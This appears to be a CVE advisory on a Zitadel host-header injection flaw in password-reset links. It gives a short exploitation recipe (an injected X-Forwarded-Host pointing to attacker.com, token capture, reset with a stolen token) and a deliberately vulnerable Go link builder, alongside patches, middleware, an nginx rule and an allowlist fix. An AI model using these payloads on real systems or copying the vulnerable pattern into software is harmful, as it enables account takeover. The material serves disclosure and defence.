How CVE-2025-48936 Works
Zitadel versions before 2.70.12, 2.71.10, and 3.2.2 improperly trust the `Forwarded` or `X-Forwarded-Host` header when generating password reset links. An attacker who controls these headers on a reset request can make the emailed link point at a malicious domain. When the victim clicks the tampered link, the reset token is sent to that domain, allowing account takeover. The attack results in full account takeover unless Multi-Factor Authentication (MFA) or passwordless authentication is enabled. The flaw stems from insufficient validation of HTTP headers during URL construction.
DailyCVE Form
Platform: Zitadel
Version: <2.70.12, <2.71.10, <3.2.2
Vulnerability: Host header injection
Severity: Critical
Date: 06/04/2025
Prediction: Patch expected by 06/15/2025
What Undercode Say:
Exploitation
1. Craft malicious request:
POST /password/reset HTTP/1.1
Host: legit.zitadel
X-Forwarded-Host: attacker.com
2. Intercept token:
tcpdump -i eth0 'port 80 and host attacker.com'
3. Reset password:
POST /password/confirm?token=STOLEN_TOKEN HTTP/1.1
Host: attacker.com
Protection
1. Update Zitadel:
docker pull zitadel/zitadel:v3.2.2
2. Header validation middleware:
import "net/http"

// ValidateHostHeader rejects any request that arrives with an X-Forwarded-Host header.
func ValidateHostHeader(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("X-Forwarded-Host") != "" {
			http.Error(w, "Invalid header", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}
3. Nginx mitigation:
server {
    if ($http_x_forwarded_host) {
        return 403;
    }
}
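Rejecting every request that carries X-Forwarded-Host also breaks deployments where a trusted reverse proxy sets that header legitimately. The following added example (not Zitadel's code) shows the alternative: honour a forwarded host only when it matches an allowlist of configured public hostnames and otherwise pin the canonical hostname, with the flawed link builder beside the hardened one. The hostnames, the `Forwarded` header parsing, and the suspicious flag are constructed for illustration.

```go
package main

import (
	"net"
	"net/http"
	"net/url"
	"strings"
)

// Assumed configuration (not Zitadel's): the canonical public hostname and the hosts a trusted proxy may present.
const canonicalHost = "auth.example.com"
var trustedHosts = map[string]bool{"auth.example.com": true, "login.example.com": true}

// forwardedHost returns the host from X-Forwarded-Host or the host= parameter of an RFC 7239 Forwarded header (first hop), lower-cased, port stripped.
func forwardedHost(r *http.Request) string {
	h := r.Header.Get("X-Forwarded-Host")
	if h == "" { // e.g. Forwarded: for=203.0.113.5;host=attacker.example;proto=https
		for _, p := range strings.Split(strings.Split(r.Header.Get("Forwarded"), ",")[0], ";") {
			if k, v, ok := strings.Cut(strings.TrimSpace(p), "="); ok && strings.EqualFold(k, "host") {
				h = strings.Trim(v, `"`)
			}
		}
	}
	h = strings.TrimSpace(strings.Split(h, ",")[0])
	if host, _, err := net.SplitHostPort(h); err == nil {
		h = host
	}
	return strings.ToLower(h)
}

// vulnerableResetLink reproduces the flawed pattern: the header-supplied host lands in the emailed link, so the token is sent to it.
func vulnerableResetLink(r *http.Request, token string) string {
	host := forwardedHost(r)
	if host == "" {
		host = r.Host
	}
	return "https://" + host + "/password/confirm?token=" + token
}

// hardenedResetLink honours a forwarded host only if allowlisted, otherwise pins the canonical host; the bool flags an unexpected host for logging.
func hardenedResetLink(r *http.Request, token string) (string, bool) {
	host, suspicious := canonicalHost, false
	if fwd := forwardedHost(r); fwd != "" && !trustedHosts[fwd] {
		suspicious = true
	} else if fwd != "" {
		host = fwd
	}
	u := url.URL{Scheme: "https", Host: host, Path: "/password/confirm", RawQuery: url.Values{"token": {token}}.Encode()}
	return u.String(), suspicious
}
```

Logging the suspicious flag gives a detection signal for tampering attempts that the grep in the Detection section does not provide.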
Analytics
- Attack complexity: Low (no user interaction beyond clicking email)
- Exploit prevalence: High (public PoCs expected)
- Mitigation adoption rate: Medium (MFA reduces impact)
Detection
grep -r "X-Forwarded-Host" /etc/zitadel
References
- CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-48936
- Patch: GitHub Zitadel releases
Sources:
Reported By: nvd.nist.gov